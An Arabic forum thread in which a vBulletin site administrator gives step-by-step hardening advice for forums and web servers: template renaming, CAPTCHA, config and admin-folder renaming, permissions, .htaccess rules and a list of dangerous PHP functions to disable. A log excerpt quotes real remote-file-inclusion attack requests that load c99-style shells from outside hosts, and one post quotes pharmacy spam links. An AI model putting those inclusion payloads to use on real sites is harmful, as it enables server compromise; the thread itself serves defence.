معهد دعم اتش فى اى بى اس لحلول الويب - Powered by vBulletin


 
 
النتائج 1 إلى 9 من 9

الموضوع: شرح حماية المنتدى والسيرفر مقدمة من Hvips.net

  1. #1
    أدارى
    الصورة الرمزية HVIPS4


    تاريخ التسجيل: Jun 2011
    رقم العضوية: 6
    الدولة: Cairo
    المشاركات: 1,979
    HVIPS4 غير متواجد حالياً

    Angry شرح حماية المنتدى والسيرفر مقدمة من Hvips.net


    شرح الحمايه للمنتدى والسيرفر بالتفصيل
    شرح الحمايه للمنتدى والسيرفر بالتفصيل
    السلام عليكم ورحمة الله وبركاته

    طال عمركم اليوم خلصت من شرح لخمس طرق هامة لو تنفذها بإذن الله راح تريح راسك

    من عمليات الأختراقات اللي صايرة بشكل كبير للمنتديات

    وشرحي راح اخليه على شكل نقاط وهو كالتالي :

    كل شرح من هالشروحات التاليه مرفوع على موقعي لتعم الفائدة للجميع

    ـــــــــــــــــــــــــ ـــــــــــــــــــــ
    يوجد إستغلال جديد في ملف global.php
    وطريقة الترقيع والحل مذكور

    | شروحها كالتى |

    ثير منا يشاهد منتديات يتم اختراقها عن طريق ال spacer_open

    وهذا حل مبدئي لتفادي الاختراق بواسطة هذا القالب
    فكرة الترقيع : تغيير اسم قالب spacer_open الى اسم مايعرفه احد الا انت وبذلك عندما يضرب المخترق قالب ال spacer_open لن يجدى ذلك نفعا لانه لن يكون له اي وجود

    شرح الترقيع :

    افتح ملف global.php

    ثم ابحث عن

    كود PHP:
    eval('$spacer_open = "' fetch_template('spacer_open') . '";'); 
    معنى الكود انه المتغير $spacer_open يقوم بإستدعاء القالب spacer_open


    سوف نقوم بتغيير اسم القالب الى اي اسم نريده وليكن مثلا ahmod

    اي اننا سوف نستبدل الكود العلوي بهذا الكود

    كود PHP:
    eval('$spacer_open = "' fetch_template('ahmod') . '";'); 
    بذلك اصبح المتغير $spacer_open يقوم بإستدعاء القالب ahmod والقالب spacer_open ليس له اي فائدة ,,,

    لم يبقى الى شئ بسيط

    من لوحة التحكم

    الاستايلات والقوالب

    التحكم في الاستيلات ثم نقوم بإضافة قالب جديد باسم ahmod (طبعا يجب ان يكون اسم القالب متوافق مع الاسم اللى وضعته في ملف global.php )

    ثم تقوم بوضع التالي في هذا القالب

    كود PHP:
                                <!-- open content container --> 
    <if 
    condition="$show['old_explorer']"
        <
    table cellpadding="0" cellspacing="0" border="0" width="$stylevar[outertablewidth]align="center"><tr><td class="page" style="padding:0px $stylevar[spacersize]px 0px $stylevar[spacersize]px"
    <else /> 
    <
    div align="center"
        <
    div class="page" style="width:$stylevar[outerdivwidth]; text-align:$stylevar[left]"
            <
    div style="padding:0px $stylevar[spacersize]px 0px $stylevar[spacersize]px"
    </if> 
    -----------------------------------------
    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

    يجب تفعيل خاصية التحقق من الصورة عند إرسال اي رسالة للمشرف العام بخاصية اتصل بنا
    حيث انه يتم إستغلال هذه الخاصية عبر الفلودة برسائل كثيرة جداً على بريد المشرف العام
    وحلها تم شرحه على كالتالى

    ------------------

    السلام عليكم ورحمة الله وبركاته

    بعض الأخوان شكله ما فهم موضوعي الحين بشرح لكم

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي


    السالفة طال عمركم ان لي حوالي اسبوعين

    بريدي صاير يمتلي بسبب هذه الرسائل المزعجة اللي تجيني بواسطة اتصل بنا من المنتدى

    وكل هالرسائل بطريقة غير معروفة ومن اشخاص غير معروفين

    وتبين لي ان هالطريقة تستخدم للفلودة على البريد الخاص بإستقبال الرسائل للمدير العام

    وهيا شبيهة لطريقة التسجيل بألف اسم للمنتدى

    وانا ما طرحت الحل هذا الا بعد تجربته والتأكد من سلامة الطريقة

    واغلب محتويات الرسائل كالتالي

    تنبيه لا احد يضغط على الروابط لأني ماني متأكد حقت ايش


    كود PHP:
                                هذه الرسالة تم إرسالها من قبل (Hvips.netللإتصال بنا بواسطة 
    pvlye


    -------------------------------- 

    http://onlinemeds.blogyx.com/ phentermine 
    <a href="http://onlinemeds.blogyx.com/">phentermine</a
    [
    url=http://onlinemeds.blogyx.com/]phentermine[/url] 
    [url]http://xanaxbuy.ipbfree.com/[/url] xanax 
    <a href="http://xanaxbuy.ipbfree.com/">xanax</a
    [
    url=http://xanaxbuy.ipbfree.com/]xanax[/url] 
    [url]http://cheappharmacy.blogyx.com/[/url] viagra 
    <a href="http://cheappharmacy.blogyx.com/">viagra</a
    [
    url=http://cheappharmacy.blogyx.com/]viagra[/url] 
    [url]http://buyultram.ipbfree.com/[/url] ultram 
    <a href="http://buyultram.ipbfree.com/">ultram</a
    [
    url=http://buyultram.ipbfree.com/]ultram[/url] 
    [url]http://tramadolbuy.ipbfree.com/[/url] tramadol 
    <a href="http://tramadolbuy.ipbfree.com/">tramadol</a
    [
    url=http://tramadolbuy.ipbfree.com/]tramadol[/url] 

    -------------------------------- 
    Referring Pageindex.php 
    IP Address
    222.237.78.113 
    User Name
    غير مسجل 
    User ID

    كود PHP:
                                هذه الرسالة تم إرسالها من قبل (¨·.¸  منتديات رياح الحب  ¸.·¨للإتصال بنا بواسطة 
    htamt

    -------------------------------- 

    http://xanaxcheap.vdforum.ru/ 

    -------------------------------- 
    Referring Pageindex.php 
    IP Address
    74.34.199.219 
    User Name
    غير مسجل 
    User ID

    وطريقة منع هذه الرسائل سهل جداً تابع معي

    بعد تفعيل التحقق من الصورة سوي تسجيل خروج وتأكد راح تلاقي ان الصورة صارت زي الصورة التالية

    وقمت بالتجربة لسلامة الحركة والتأكد ان الرسائل راح توصل لبريدي بعد التحقق وكانت هذه النتيجة

    --------------------------------------------

    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

    لمنع جميع اكواد التحويل وتعطيلها في شريط المواضيع والإحصائيات والإهداءا ادخل هنا

    الشرح كالتالى

    زيادة الأمان ومنع جميع اكواد التحويل وتعطيلها حمل الملفات التاليه

    بتلاقي هاك بأسم product-protect_from_xss.xml ارفعه من لوحة تحكم المشرف العام كأي هاك عادي

    اللي مركبين شريط الإهداءات كل اللي عليك تستبدل ملف ehdaa.php بداخل مجلد vb



    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

    لإغلاق ثغرة الفلودة بأكثر من الف أسم في الدقيقة الواحدة تفضل
    ادخل على لوحة تحكم المشرف العام للمنتدى ثم خيارات المنتدى ثم خيارات تسجيل الأعضاء ثم
    ستجد خيار بأسم (( التحقق بالصورة )) حطه على نعم
    ولحذف جميع الأسماء التي تم أستخدامها دفعة واحدة تفضل هنا

    اعتقد الكثير يعلم بأمر ثغرة الفلود بالمنتديات والتي تجعل تسجيل ما يقارب 2000 عضو في دقائق

    وكان يتطلب الامر حذف المسجلين يدوياً وهذا يأخذ وقت كبير او اعادة الباك آب للموقع مما يؤدي لفقد

    المواضيع

    الترقيع هو بتفعيل التحقيق من الصوره او تفعيل هاك الجنس او علم الدوله

    الحل بسيط جداَ لحذف العضويات الوهميه

    نفذ الامر التالي بقاعدة البيانات فقط لا غير

    ولكن قبلها ابحث عن رقم اخر عضو مسجل قبل الثغره

    استبدل xxx برقم العضويه الاخيره قبل تسجيل ثغرة الفلود

    كود PHP:
    DELETE FROM user WHERE userid xxx ;  
    DELETE FROM userfield WHERE userid xxx ;  
    DELETE FROM usernote WHERE userid xxx ;  
    DELETE FROM user textfield WHERE userid xxx 
    ـــــــــــــــــــــــــ ــــــــــــــــــــــ

    تحديث هاك Issw v 3 حمايه شامله للمنتدي من استغلالات وتحويل الفريق الامني

    السلام عليكم ورحمة الله وبركاته

    الحمد لله على كل شيء
    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي
    من غير مقدمات قمت في اعادة برمجة هاك الحماية وتحديثه

    بسبب طلب الكثير من الاخوه لوجود لوحت تحكم خاصه في الهاك اضفت لوحت تحكم

    وكذالك لمن طلب مني منع اكواد التحويل لاخر عشر مواضيع او الاهدائات

    او الاحصائيات


    فقمت في تطوير ومنع html لعنواوين المواضيع وهذا للتخلص من اكواد التحويل

    وضفت خيار لتفعيل منع التحويل او ايقافه
    لاصحاب المنتديات التي لاترغب في تفعيل هذي الميزة فيه

    كما موضح في الصورة التالية


    الخيار الاول : لتشغيل حمايه المنتدي

    منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

    منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

    حجب عدة مواقع تساعد على العبث في المنتديات

    تطوير للدوال القديمة للتوافق معه السيرفر

    منع اكثر اوامر اليونكس وحيل الحقن في الشيل

    اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):

    الخيار الثاني :
    منع اكواد التحويل لاخر عشر مواضيع
    والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع

    تحت التجربة والتطوير
    الان نأتي للقسم الاكثر اثارة للموضوع

    عند دخولك مجلد sec

    افتح الملف logfile_hacker.txt

    ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

    كود PHP:
    2007-12-1105:50:441197370244209.67.223.188p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808 
    2007-12-1106:32:221197372742203.211.135.147t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808 

    2007-12-1107:09:461197374986211.157.108.187p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79 
    2007-12-1109:15:081197382508200.102.138.66t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library) 
    الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

    طبعا الفاصلة تفصل بين كل معلومه ومعلومة

    كود PHP:

    التاريخ والوقت

    كود PHP:
    2007-12-1105:50:44
    عدد المحاولات

    كود PHP:
    1197370244 
    ايبي الموقع المصااب

    كود PHP:
    209.67.223.188 
    الاصابة طبعا تشفرت لاغراض امنيه

    كود PHP:
    p=11575//codebb/lang_select 
    الاستغلال

    كود PHP:
                           ?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? 
    نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
    يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه

    كود PHP:
    libwww-perl/5.808 
    الان شرح التركيب

    امسح جميع هاكات لها علاقه في الحمايه او منع xss

    اما من ركب هاك الحمايه issw v2

    عليه فقط حذف ملف البرودكت

    وتركيب المحدث


    شرح حذف الهاك


    من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

    ومن ثم حذف توابعه

    ---------------------------------------------------------------------------
    التركيب


    نرفع مابداخل upload الى المنتدي

    نعطي الترخيص 666
    logfile_hacker.txt
    counter.txt

    الان من لوحت تحكم المنتدي قم برفع البرودكت

    تم تجربت المنتج على الاصدار

    3.6.8

    ـــــــــــــــــــــــــ ــــــــــــــــــــــ

    لإسترجاع المنتدى إذا تم إختراقه بواسطة ثغرة تغيير تمبليت forumhome او تمبليت FAQ

    بسم الله الرحمن الرحيم


    الاخوه الاعزاء اعذاء معهد ترايدنت

    ازف لكم البشرى بإنتهائي من برمجه سكريبت vBulltein anti hacker المخصص لإستعادة المنتدى بعد الاختراق!

    كما نرى فقد كثرة الاختراقات في الاونه الاخيره وتعددت اساليبها ، واصبحت طرق الاختراق كل يوم عن يوم اعقد مما يزيد من صعوبة استعادة المنتدى بعد الاختراق

    ولكن ولله الحمد اقول لكم بأن الحل هنا بهاذا السكريبت

    كلنا نذكر مشكلة الاختراق عن طريق تغغير تمبليت FORUMHOME الاصلي!

    وثغرة الانكلود عن طريق تمبليت الFQA الي يعملها الهكر حتى يستطيع العوده للمنتدى بعد إصلاحه!!!

    وتغغير عضويه الادمن وتجريده من صلاحياته!!!

    ولكن مع هاذا السكريبت وداعا لكل هاذا

    يقوم السركيبت بمعالجة جميع هاذه المشاكل إن شاء الله

    السكريبت يقوم بمعالجة التمبليت forumhome الاصلي وإعادتة الي حالته الاصليه
    السكريبت يقوم بمعالجه التمبليه FAQ وإعادة الى حالتة الاصليه
    السكريبت يقوم بإضافه عضويه ادمن جديده معها كافه الصلاحيات

    طريقه الاستخدام

    قم برفع السكريبت الى مجلد المنتدى الرئيسي مثال
    http://domain.com/vb/docnok.php

    ثم قم بتشغيله وسيبدأ بالعمل إن شاء الله

    سيعالج جميع المشاكل ويعطيك اسم المستخدم وكلمة المرور الجديده لعضويه الادمن

    [COLOR="Red"]لا تنسى حذف السكريب بعد الانتهاء من استخدامة حتى لا يستخدمة اح اخر لاغراض خاطئهOR]

    السكريبت مشفر بالزند خوفا من ان يتم تعديله واستغلاله لأغراض خاطئه

    السكريبت قادر على الاتصال بملف الconfig حتى لو كان مشفر بالزند!!

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي
    السكريبت مجاني ويسمح بتوزيعه ونسخه وكل ما اطلبه منكم هو الدعاء الصالح (خاصة انه انا بخوض معركة امتحانات الثانويه العامة)
    طبعا لا يتطلب ان نطلب التثبيت من المشرفين

    الملف مرفق

    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

    في المشاركة رقم (3) بعنوان
    شرح تركيب الجدران الناريه للمجلدات الهامه بالصور
    لا انصح بوضع جدار ناري على مجلد الأرشيف archive لأنه تبين بعدم وجود ثغرة معينة

    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

  2. #2
    أدارى
    الصورة الرمزية HVIPS4


    تاريخ التسجيل: Jun 2011
    رقم العضوية: 6
    الدولة: Cairo
    المشاركات: 1,979
    HVIPS4 غير متواجد حالياً

    رد: شرح حماية المنتدى والسيرفر مقدمة من Hvips.net


    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ


    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    شرح تغيير مسمى الكونفيج مع تغيير مساره بالصور

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي


    أول شيء ركز معي الشرح سهل بس يبي تركيز

    الملفات اللي راح نعدل عليها مجلدين فقط

    admincp
    includes

    اما مجلد

    install

    فيرجى حذفه بالكامل

    أول شي عشان تضمن العمل اللي بنسويه خذ نسخة من الملفات اللي بذكرها على جهازك
    ونبحث عن ملف اسمه admincp اللحين نروح للأف تي بي ونختار مجلد
    diagnostic.php

    وهو على هذا المسار

    public_html / vb /admincp على المسار التالي
    ونضغط على كلمة بحث config.php ونحط بداخلها كلمة ctrl+f نفتح الملف ونضغط على كلمة
    شوفوا بالصورة كيف بتطلع لنا

    ملف مرفق 402

    نمسح اللي كلمة كونفيج اللي طلعت لنا ونستبدلها بالأسم الجديد اللي اخترته انا وهو seatuswqrds.php

    طبعا هذي موجوده مرتين ... الحين خلصنا من هالملف اللي في الأدمين سي بي

    اللحين بنروح نعدل على مجلد الأنكلوديس وفيه خمس ملفات للتعديل
    على المسار التالي public_html / vb /includes

    adminfunctions.php
    class_core.php
    functions.php
    config.php
    init.php


    الحين ببداء بملف adminfunctions.php

    انا بختار الأسم الجديد للكونفيج واخترت لكم اسم

    seatuswqrds.php

    ونضغط على كلمة بحث config.php ونحط بداخلها كلمة ctrl+f نفتح الملف ونضغط على كلمة
    شوفوا بالصورة كيف بتطلع لنا

    ملف مرفق 403


    نمسح اللي كلمة كونفيج اللي طلعت لنا ونستبدلها بالأسم الجديد اللي اخترته انا وهو seatuswqrds.php

    طبعا هذي موجوده مره واحد فقط ... الحين خلصنا من اول ملف نروح للثاني

    وهو class_core.php
    ونضغط على كلمة بحث config.php ونحط بداخلها كلمة ctrl+f نفتح الملف ونضغط على كلمة
    شوفوا بالصورة كيف بتطلع لنا

    ملف مرفق 404


    وهذا الملف موجود فيه كملة كونفيج 10 مرات عدلها لـلكلمه اللي تبيها وانا عدلتها
    زي ما ذكرت لكم بالأسم اللي اخترته فوق وهو seatuswqrds.php
    اللحين خلصنا من الملف الثاني وبنروح للملف الثالث
    وهو functions.php
    ونضغط على كلمة بحث config.php ونحط بداخلها كلمة ctrl+f نفتح الملف ونضغط على كلمة
    شوفوا بالصورة كيف بتطلع لنا

    ملف مرفق 405



    وهذا الملف موجود فيه كملة كونفيج مرتين (2) عدلها لـلكلمه اللي تبيها وانا عدلتها
    اللحين خلصنا من الملف الثالث وبنروح للرابع
    وهو init.php
    ونضغط على كلمة بحث config.php ونحط بداخلها كلمة ctrl+f نفتح الملف ونضغط على كلمة
    شوفوا بالصورة كيف بتطلع لنا

    ملف مرفق 406


    وهذا الملف موجود فيه كملة كونفيج مرتين عدلها لـلكلمه اللي تبيها وانا عدلتها
    زي ما ذكرت لكم بالأسم اللي seatuswqrds.php اخترته فوق وهو
    اللحين خلصنا من الملف الرابع وبنروح للملف الخامس والأخير والأهم
    وهو config.php
    ctrl+f نفتح الملف ونضغط على كلمة
    ونضغط على كلمة بحث config['Misc']['admincpdir'] ونحط بداخلها كلمة

    وبيطلع لك زي اللي بالكلام اللي تحت
    // مسار لوحة تحكم الادارة.
    $config['Misc']['admincpdir'] = 'admincp';
    // مسار لوحة تحكم المشرفين.
    $config['Misc']['modcpdir'] = 'modcp';

    // Prefix that all vBulletin cookies will have
    // الكوكيز
    $config['Misc']['cookieprefix'] = 'bb';


    ومعني هالشي اني ابي اغير اسم لوحة تحكم المشرف العام واسم لوحة تحكم المراقبين ومعلومات الكوكيز

    وانا غيرتها للتالي شووفيوا
    // مسار لوحة تحكم الادارة.
    $config['Misc']['admincpdir'] = 'odtmao';
    // مسار لوحة تحكم المشرفين.
    $config['Misc']['modcpdir'] = 'mtoaq';

    // Prefix that all vBulletin cookies will have
    // الكوكيز
    $config['Misc']['cookieprefix'] = 'jdt[w@^$3djdfaseethtjk';

    الكوكيز حط اي شي تبيه انت وخربطه عادية اهم شي تغيره من اللي هو فيه القديم
    شوفوا بالصورة كيف بتطلع لنا

    ملف مرفق 406

    وفي الأخير غيرت مسمى الكونفيج الأصلي إلى الأسم اللي اختره انا شوفوا الصورة

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    والملف اللي اسمه config.php فتحته وخليت معلومات القاعدة + اسم المستخدم + الباسورد كلها غلط ووهميه
    شوفوا كيف ووين مكان اسم القاعدة والباسورد حقها
    سوي بحث عن كلمة config['Database']['dbname']
    بيطلع لي زي كذا
    $config['Database']['dbname'] = '7by_v871b';
    شوفوا غيرت اللي بي حرف $ وحرف ' زي ما ابغى انا
    7by_v871b
    اللحين غيرنا اسم قاعدة البيانات إلى اسم وهمي باقي نغير اللحين اسم المستخدم للقاعدة وباسورده
    سوي بحث عن كلمة
    config['MasterServer']['username']
    شوفوا بيطلع لنا زي كذا
    // ****** MASTER DATABASE USERNAME & PASSWORD ******
    // This is the username and password you use to access MySQL.
    // اسم المستخدم لقاعدة البيانات.
    $config['MasterServer']['username'] = '7by_v871b';
    // باسورد قاعدة البيانات.
    $config['MasterServer']['password'] = '987456$75';


    نغير اللي باللون الأزرق شوفوا
    اللحين بيصير عندنا ست ملفات بنرفعها لداخل الأنكلوديس
    على المسار التالي public_html / vb /includes
    adminfunctions.php
    class_core.php
    functions.php
    config.php
    init.phpوهذا ملف الكونفيج الأصلي اللي غيرنا مسماه
    seatuswqrds.php
    وبعد الأنتهاء من تغيير المسميات ارفع كل ملف على نفس المسار اللي ذكرته
    وروح عن طريق الأف تي بي وبتلاقي مجلد اسمه admincp وغيره زي ما غيرته انا بداخل الكونفيج
    وانا لو تشوف شرحي اللي فوق خليت اسمه odtmao وكذلك مجلد modcp غيرته إلى mtoaq
    وبعد رفع الملفات اللي غيرناها إلى داخل مساراتها المشروحة ارفع ملفين جديدين إلى مجلد vb وسميهم admincp و modcp
    بتسألوني ليش كذا اللحين اقول لكم احنا في البداية غيرنا مسمى لوحة التحكم وبنرفع المجلدين الفاضيين
    عشان يكونوا وهميين وتخدع الشخص الليى يبي يحاول يوصل لهالمجلد وزيادة على كذا ركب
    وخلي هالملف فاضي عشان عليهم جدران ناريه وحط بداخلهم ملف index.php
    لو كسر جدار الحماية ودخل يطلع له الصفحة بيضاء فاضيه

    وفي الملف المرفق في نهاية موضوعي هدية مني لكم كونفيج مشفر ارفعه على منتداك ولكن ضروري

    تسوي كونفيج ثاني ويكون وهمي زي شروحاتي اللي فوق

    واتمنى ان يكون شرحي قد نال على رضاكم وإعجابكم واعذروني لو قصرت معاكي بشي واعتذر على الإطالة

  3. #3
    أدارى
    الصورة الرمزية HVIPS4


    تاريخ التسجيل: Jun 2011
    رقم العضوية: 6
    الدولة: Cairo
    المشاركات: 1,979
    HVIPS4 غير متواجد حالياً

    رد: شرح حماية المنتدى والسيرفر مقدمة من Hvips.net


    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    شرح إخفاء ملفات منتداك عن اي ملف شيل بالكامل

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    السلام عليكم ورحمة الله وبركاته

    عند الدخول لرفع او تعديل ملف عن طريق برنامج الأف تي بي او عن طريق السي بانل لن تستطيع كذلك

    الا عند تنفيذ الشرح التالي ويجب عليك بعد الإنتهاء إرجاء الملف مثلما كان تابع معي الشرح

    ادخل عبر الرابط التالي مع تغيير (××××) وكلمة com حسب معلومات دومينك

    http://www.×××××.com/cpanel/

    او عن طريق الرابط

    http://www.×××××.com:2082/

    وسيظهر لك جدار ناري قم بوضع اليوزر والباسورد الخاص بلوحة تحكم الموقع الرئيسية

    وعند الدخول ستظهر لك خيارات وأوامر خاصة بالتحكم بالموقع وكل اللي يهمنا هو

    شي اسمها إدارة الملفات وصورته كالتالي


    ملف مرفق 407

    قم بالضغط عليها وسيظهر لك ملفات موقعك كاملة واللي يهمنا هو اللي في الصورة التاليه
    واللي انا مظلله ومحدد عليه


    ملف مرفق 408

    ركز معاي شوي اللي يهمنا اللحين هو ان تضغط على المجلد الأصفر وليس على كلمة ببلك هتمل
    وبعد الضغط على المجلد ستظهر ملفات الموقع الداخليه كالصورة التاليه


    ملف مرفق 409

    نرووح ونضغط على كلمة vb
    بعد الضغط على كلمة في بي بتطلع لك خيارات على يدك اليمين فوق مثل الصورة التاليه

    ملف مرفق 410


    اضغط على كلمة Change Permissions
    وبعد الضغط راح يطلع راح يختفي المربع اللي فوق ويطلع مربع مكانه وهذه صورة له

    ملف مرفق 412

    شوف بتلاقي الرقم 755 مثل ماهو موجود فوق بالصورة وطريقة تغيير هالتصريح
    كل اللي عليك تحرك الماوس وتضغط على المربعات وبتلاقي الأرقام تتغير
    الصورة اللي فوق بتصريح 755 هذا راح يظهر لك ملفات منتداك كامله وتقدر تعدل وترفع
    زي ما تبغى وبعد ما تخلص من اللي تبيه انت ترجع التصريح رقم 111 وهذه صورة له

    ملف مرفق 413

    شايف علامات الصح اختفت وصار الرقم عندنا هو 111 واضغط على تعديل وبكذا تكون اخفيت كل
    ملفات المنتدى وريحت راسك
    وبعد ما تضغط على كلمة تعديل راح تلاقي الصفحة تحدثت ورجعت لملفات موقعك مرة ثانية
    وبتلاقي رقم التصريح صار جنب مجلد المنتدى اللي سوينا الشرح عليه وهذه صورة له

    ملف مرفق 414

    مختصر الكلام التصريح رقم 755 يظهر لك ملفات منتداك كامله
    التصريح رقم 111 يخفي لك ملفات منتداك كامله

    واعتذر على الإطاله

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي
    شرح تركيب الجدران الناريه للمجلدات الهامه بالصور

    لا انصح بوضع جدار ناري على مجلد الأرشيف archive لأنه تبين بعدم وجود ثغرة معينة

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    السلام عليكم ورحمة الله وبركاته

    تابع معي الشرح
    ادخل عبر الرابط التالي مع تغيير (××××) وكلمة com حسب معلومات دومينك
    http://www.×××××.com/cpanel/
    او عن طريق الرابط
    http://www.×××××.com:2082/
    وسيظهر لك جدار ناري قم بوضع اليوزر والباسورد الخاص بلوحة تحكم الموقع الرئيسية
    وعند الدخول ستظهر لك خيارات وأوامر خاصة بالتحكم بالموقع وكل اللي يهمنا هو
    مثل هالصورة اللي بأسم الحماية برقم سري

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    اللحين روح لكلمة

    public_html واضغط على المجلد اللي باللون الأصفر

    وبعض شركات الإستضافة يكون هالملف غير واغلبه يكون بأسم حماية المجلدات الهامه
    بعد ما تضغط عليه راح تطلع لك ملفات موقعك كل اللي يهمنا اللحين هو ان
    تضغط على ملجد vb وليس على الأسم اضغط على المجلد

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    حتى تطلع لك مجلدات المنتدى اللي نبي نشرح عليها
    شوف راح نركب الجدران الناريه على
    المجلدات التاليه
    admincp
    modcp
    includes
    archive
    اسم المجلد اللي غيرناه حق المشرف العام
    اسم مجلد المراقبين اللي غيرنا مساره
    شوفوا الصورة
    ملف مرفق 415


    طريقة التركيب اضغط على اسم admincp وليس على المجلد على الأسم لا تنسى
    بيطلع لك كما في الصورة التاليه تابع معي

    ملف مرفق 417

    ملف مرفق 416


    وبهالطريقة ركبنا الجدار الناري على الملجلد اللي نبيه
    وطبق نفس الشرح على باقي المجلدات
    اللي ذكرتها
    وبكذا نكون ركبنا الجدران الناريه على كل المجلدات
    اتمنى ان يكون الشرح واضح وان
    يكون نال على رضاكم

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    حماية مراكز التحميل وبعض الأوامر المهمة لأصحاب السيرفرات

    نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

    السلام عليكم ورحمة الله وبركاته

    هذا الشرح خاص للأخوان اللي يستخدمون مراكز تحميل صور
    او اي ملف يحمل التصريح 777
    يقوم اغلب المخترقين من رفع ملف php
    إلى الخادم بأي ثغرة كانت وبعد الرفع راح يبحث عن المجلدات ذات تصريح 777 أو 707 لأن صلاحياته
    صلاحيات زائر وحين يجد هذه المجلدات فسوف يستخدمها كمستودع لملفاته وسكربتاته مثل


    PHPShell ، MySQLInterface

    والكثير الكثير من هالشي بعدها راح يوصل إلى ملفات موقعك قول العوض بسلامتك

    الحل

    بتعطيل تنفيذ الـ php
    داخل هذه المجلدات عن طريق تعليمه تضيفها في ملف

    .htaccess
    كود PHP:
    php_flag engine off 
    بعدها تقوم برفع ملف الـ .htaccess
    الى كل المجلدات ذات تصريح 777

    نصيحتي لكل اصحاب السيرفرات يجب عليك منع كل هذه الدوال وخاصة دالة كوبي

    كود PHP:
    dlexecshell_execsystempassthrupopenpcloseproc_openproc_niceproc_terminate proc_get_statusproc_closepfsockopenleak 
     apache_child_terminate
    posix_killposix_mkfifoposix_setpgidposix_setsidposix_setuidescapeshellcmdescapeshellarghell-execfpassthruexeccrack_checkcrack_closedictcrack_getlastmessagecrack_opendictpsockopenphp_ini_scanned_filesphp_unamephpinfocopy 
    هالدالة copy بعدم منعك لها راح يتم إختراق المواقع الكثيرة التي على استضافتك
    وإذا انت يا صاحب الإستضافة تبي تحمي نفسك والمواقع اللي بإستضافتك
    مهم جداً جداً جداً قرائة هذا الموضوع بالكامل


    السلام عليكم ورحمة الله وبركاته
    أخواني الأكارم أٌقدم لكم هذه المجموعة من الدروس المنتقاة لحماية و زيادة أمن السيرفر وجعله مستقرا وقد قمت بجمع هذه الدروس من أشهر المواقع الأجنبية في مجال حماية السيرفر وذلك بعد تجريبها والتأكد من صحتها وخلوها من أي خطأ وأتمنى أن يلقى عملي هذا ترحيبا وتشجيعا من الجميع وأن يساعد كل من ليس لديه خبرة في إدارة وحماية السيرفر قد استفاد من هذه الدروس كما قمت باختيار هذا الموقع اقصد الويب العربي نظرا لتفوقه على جميع الماوقع العربية على الإطلاق في هذا المجال ولنبدأ بالدرس الأول:
    ================================================== ===================
    Root Check
    ================================================== ===================
    يقوم بفحص وعمل سكان للنظام لمعرفة ما إذا كان هناك أي تروجان ويقوم بفحص البورتات ومعرفة إذا كان هناك أي مخترق كما يقوم بفحص اللوغ و السماحيات والكثير...

    تعليمات التنصيب
    -------
    قم بالدخول إلى السيرفر كرووت
    نفذ التعليمات التالية:


    كود PHP:
    wget http://www.ossec.net/rootcheck/files/rootcheck-0.4.tar.gz 

    tar -xvzf rootcheck-0.4.tar.gz 
    cd rootcheck
    -0.4 
    ./install 

    ذلك تكون قد قمت بتنزيل الرووت تشيك على السيرفر وعندما ينتهي التنصيب ستستقبل الرسالة التالية:


    كود PHP:
    Compilation sucessfullReady to go
    --------------------------------------------------------- 
    Thats it! If everything went okyou should be ready to run RootCheck. If you any doubts 
     about installation
    please refer to INSTALL fileYou can also find additional information  
    at 
    :   http://www.ossec.net/rootcheck/  Improves, patches, comments are very welcome. 

    --------------------------------------------------------- 


    فحص النظام
    -------
    الآن بعد ان قمت بالتنصيب يمكنك فحص النظام من خلال التعليمة التالية:

    كود PHP:
                           ./rootcheck.pl 
    ستنتقل بعدها إلى شاشة تفاعلية وستخزن جميع المعلومات في الملف
    results.txt
    حيث ستجد معلومات واضحة عن الملفات المشتبه بها وما قام به البرنامج أثناء الفحص
    إذا أردت معلومات أكثر عن الرووت تشيك يمكن أن تجدها في الموقع
